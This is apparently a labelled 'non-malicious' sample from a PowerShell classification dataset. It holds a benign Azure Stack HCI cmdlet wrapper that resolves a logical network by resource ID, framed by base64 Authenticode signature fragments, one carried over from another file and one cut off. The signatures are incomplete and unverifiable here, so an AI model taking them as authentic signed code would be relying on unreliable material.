# CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u
# MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
# b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTI0
# MDcyNTE4MzEyMloXDTI1MTAyMjE4MzEyMlowgdMxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w
# ZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjU1MUEt
# MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl
# MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAtWrf+HzDu7sk50y5YHhe
# CIJG0uxRSFFcHNek+Td9ZmyJj20EEjaU8JDJu5pWc4pPAsBI38NEAJ1b+KBnlStq
# U8uvXF4qnEShDdi8nPsZZQsTZDKWAgUM2iZTOiWIuZcFs5ZC8/+GlrVLM5h1Y9nf
# Mh5B4DnUQOXMremAT9MkvUhg3uaYgmqLlmYyODmba4lXZBu104SLAFsXOfl/TLhp
# ToT46y7lI9sbI9uq3/Aerh3aPi2knHvEEazilXeooXNLCwdu+Is6o8kQLouUn3Kw
# UQm0b7aUtsv1X/OgPmsOJi6yN3LYWyHISvrNuIrJ4iYNgHdBBumQYK8LjZmQaTKF
# acxhmXJ0q2gzaIfxF2yIwM+V9sQqkHkg/Q+iSDNpMr6mr/OwknOEIjI0g6ZMOymi
# vpChzDNoPz9hkK3gVHZKW7NV8+UBXN4G0aBX69fKUbxBBLyk2cC+PhOoUjkl6UC8
# /c0huqj5xX8m+YVIk81e7t6I+V/E4yXReeZgr0FhYqNpvTjGcaO2WrkP5XmsYS7I
# vMPIf4DCyIJUZaqoBMToAJJHGRe+DPqCHg6bmGPm97MrOWv16/Co6S9cQDkXp9vM
# SSRQWXy4KtJhZfmuDz2vr1jw4NeixwuIDGw1mtV/TdSI+vpLJfUiLl/b9w/tJB92
# BALQT8e1YH8NphdOo1xCwkcCAwEAAaOCAUkwggFFMB0GA1UdDgQWBBSwcq9blqLo
# PPiVrym9mFmFWbyyUjAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf
# BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz
# L2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmww
# bAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29m
# dC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El
# MjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF
# BwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEAOjQAyz0cVztT
# FGqXX5JLRxFK/O/oMe55uDqEC8Vd1gbcM28KBUPgvUIPXm/vdDN2IVBkWHmwCp4A
# Icy4dZtkuUmd0fnu6aT9Mvo1ndsLp2YJcMoFLEt3TtriLaO+i4Grv0ZULtWXUPAW
# /Mn5Scjgn0xZduGPBD/Xs3J7+get9+8ZvBipsg/N7poimYOVsHxLcem7V5XdMNsy
# tTm/uComhM/wgR5KlDYTVNAXBxcSKMeJaiD3V1+HhNkVliMl5VOP+nw5xWF55u9h
# 6eF2G7eBPqT+qSFQ+rQCQdIrN0yG1QN9PJroguK+FJQJdQzdfD3RWVsciBygbYaZ
# lT1cGJI1IyQ74DQ0UBdTpfeGsyrEQ9PI8QyqVLqb2q7LtI6DJMNphYu+jr//0spr
# 1UVvyDPtuRnbGQRNi1COwJcj9OYmlkFgKNeCfbDT7U3uEOvWomekX60Y/m5utRcU
# PVeAPdhkB+DxDaev3J1ywDNdyu911nAVPgRkyKgMK3USLG37EdlatDk8FyuCrx4t
# iHyqHO3wE6xPw32Q8e/vmuQPoBZuX3qUeoFIsyZEenHq2ScMunhcqW32SUVAi5oZ
# 4Z3nf7dAgNau21NEPwgW+2wkrNqDg7Hp8yHyoOKbgEBu6REQbvSfZ5Kh4PV+S2gx
# f2uq6GoYDnlqABOMYwz309ISi0bPMh8wggdxMIIFWaADAgECAhMzAAAAFcXna54C
# m0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE
# CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z
# b2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZp
# Y2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMy
# MjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
# EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV
# BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0B
# AQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51
# yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY
# 6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9
# cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN
# 7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDua
# Rr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74
# kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2
# K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5
# TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk
# i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9Q
# BXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3Pmri
# Lq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUC
# BBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJl
# pxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIB
# FjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9y
# eS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUA
# YgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU
# 1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2Ny
# bC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIw
# MTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0w
# Ni0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/yp
# b+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulm
# ZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM
# 9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECW
# OKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4
# FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3Uw
# xTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPX
# fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX
# VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC
# onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU
# 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG
# ahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT
# Tjo1NTFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# U2VydmljZaIjCgEBMAcGBSsOAwIaAxUA1+26cR/yH100DiNFGWhuAv2rYBqggYMw
# gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF
# AAIFAOrJVyEwIhgPMjAyNDEwMjgwMDE5NDVaGA8yMDI0MTAyOTAwMTk0NVowdDA6
# BgorBgEEAYRZCgQBMSwwKjAKAgUA6slXIQIBADAHAgEAAgIBszAHAgEAAgITSjAK
# AgUA6sqooQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIB
# AAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQABMN9oWsdpzGRz
# tiY54MmqGWUVyuXmaxbDA6z8iE8obpRv+lydBHDEzF+bzjdtPSXWUAH0/FMRRhX0
# teLdCIIacsSa/2bH70CbOdzWv6Q+8mYD34Mes4H/MfoCK+NcUU2sDPmN4LqO/2ey
# h0kKM3DzfJuIidm6cvD2YA69CSh85IuoBwIJD3zHB1gawgzN2hPCeSdXzXZoMevJ
# N33/MSsU3gjjZk0RGc4Xol2tzHMD3/GkJdRTW7K5OP46vX9QfJzbfGiC4yGAPtbI
# Y98+0m5sKTxGYHp9nxOyMAa+aGUH5MqAgXkBYGlW86uWYdQl/cvicZdjgMRYNUkl
# FP/zfxppMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
# MTACEzMAAAIB0UVZmBDMQk8AAQAAAgEwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqG
# SIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgL+lIDBAeHIo7
# YpzmX4kzVUgXDIKpuENQkpibL2YsbrwwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHk
# MIG9BCBYa7I6TJQRcmx0HaSTWZdJgowdrl9+Zrr0pIdqHtc4IzCBmDCBgKR+MHwx
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1p
# Y3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAACAdFFWZgQzEJPAAEAAAIB
# MCIEIKMcBulW2TKoXBfoaBGu0S2w65GKyV6YpORLn7xfHyoaMA0GCSqGSIb3DQEB
# CwUABIICAC1czbB8QY0x2DYvnvJxBxF6hqT1c4FlH7czqGvHrHeqaZ/LbqGse/Zi
# 0r3cmTpG0Qg48sub+47FMhjwMVTnlYjESNyOp6L4CEHNfOlis0ejIgbpmSRfNqrc
# LiF2UjEyqhVTWVtwDFMhE8+7UKCYuYKMhp0vy8FKu+Ld989BGFm0ZpP/xbMO3U2p
# ZJftCmOnj0cIKP+hvkXAl9zz+LUl2MPiCVPsJUBKaAvrLuGGsE/VThmQbjgTVua4
# wK12ECw8wecOJ2oCfWf55wwhWcmq3W4OezeubcYa75ZuVAentHO/XZmOajI0NrrW
# sJv+ralL7y1+TSRMzae1M0AVH03PAvThUvSrrcBddRe8FnTQ2cy7ihZUCnBhr022
# crMExykTrz92x8QWfuENawpNojqAVMHfuKIK3qyQMq93AMuNFh2Gmq7N51DvxWiP
# EuhFXafeOUFgS4VnxpyBUkjNnUrS4OwkBlQDCZ77oPX6FHojl1hKGm1sck/iBYjK
# saxH7YKiD26lZwcZUrDP8AQtWCyEkSy32YrgGq5Wl26LmaLYx+4tFHonSh6wORxz
# pT3jMfcsYtB6NNbuyRM1Zz8kCLu+7QUhNRqm91/rx8iRR6LgGNINuOsXpga9jC5J
# SILOnPZU/wGDv1ccJjTb+l13MVR337iMkjv/CDhag19NKzX1mEZJ
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_33_43.ps1
|
sample_33_43.ps1
|
# ----------------------------------------------------------------------------------
#
# Copyright Microsoft Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------------
<#
.Synopsis
Gets a logical network
.Description
Gets a logical network
.Outputs
Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Models.ILogicalNetworks
.Link
https://learn.microsoft.com/powershell/module/az.stackhcivm/get-azstackhcivmlogicalnetwork
#>
function Get-AzStackHCIVMLogicalNetwork_ByResourceId {
[OutputType([Microsoft.Azure.PowerShell.Cmdlets.StackHciVM.Models.ILogicalNetworks])]
[CmdletBinding(PositionalBinding=$false)]
param(
[Microsoft.Azure.PowerShell.Cmdlets.StackHciVM.Category('Path')]
[System.String]
# The ARM ID of the logical network.
${ResourceId},
[Parameter()]
[Alias('AzureRMContext', 'AzureCredential')]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Azure')]
[System.Management.Automation.PSObject]
# The credentials, account, tenant, and subscription used for communication with Azure.
${DefaultProfile},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Wait for .NET debugger to attach
${Break},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be appended to the front of the pipeline
${HttpPipelineAppend},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be prepended to the front of the pipeline
${HttpPipelinePrepend},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Run the command asynchronously
${NoWait},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')]
[System.Uri]
# The URI for the proxy server to use
${Proxy},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')]
[System.Management.Automation.PSCredential]
# Credentials for a proxy server to use for the remote call
${ProxyCredential},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Use the default credentials for the proxy
${ProxyUseDefaultCredentials}
)
process {
if ($ResourceId -match $lnetRegex){
$subscriptionId = $($Matches['subscriptionId'])
$resourceGroupName = $($Matches['resourceGroupName'])
$resourceName = $($Matches['logicalNetworkName'])
$null = $PSBoundParameters.Remove("ResourceId")
$PSBoundParameters.Add("Name", $resourceName)
$PSBoundParameters.Add("ResourceGroupName", $resourceGroupName)
$null = $PSBoundParameters.Remove("SubscriptionId")
$PSBoundParameters.Add("SubscriptionId", $subscriptionId)
return Az.StackHCIVM\Get-AzStackHCIVMLogicalNetwork @PSBoundParameters
} else {
Write-Error "Resource ID is invalid: $ResourceId"
}
}
}
# SIG # Begin signature block
# MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCB6S7RsV0M+93VD
# g01Slg3F+v9WXRnVu+Sf8UlSP+nfgqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIAI3quFKH0FCCVw9rzHznTSR
# Pkzyc6mYvXVxtCI7Nrk1MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAPGBLUNBERSJGuOvYfDG1/AiVDj1w48utpmQvHd91xFP0Rp+0lsaXh2zZ
# 3uCVl7yZ2gPqsO1JoXrBAhAbcLgC4B4RdbgarAYli6yzEfRhMWpDpEPpiIyKQTyr
# I9kM5T1xw4EVsT/MoDd1gmAJOpB8Kwg4UiicLmiT32Y6Z8MwZHqc7lgBBg7RvFOz
# 1KstHpkKYlkRLu8PcMmXwiYzjPzoewDKPjYtX85XTP6AAS4zWB9Yis8l9x4xJulh
# HcpoRNGj9jSN4U3h8fmq9nCsmngPCnzQ7ZP/2rfUCYJ16ZpCvpfD2A1Tqjo0sPsX
# EoAE9MqAgvCs1GHohtAvjyXjDQ5siaGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC
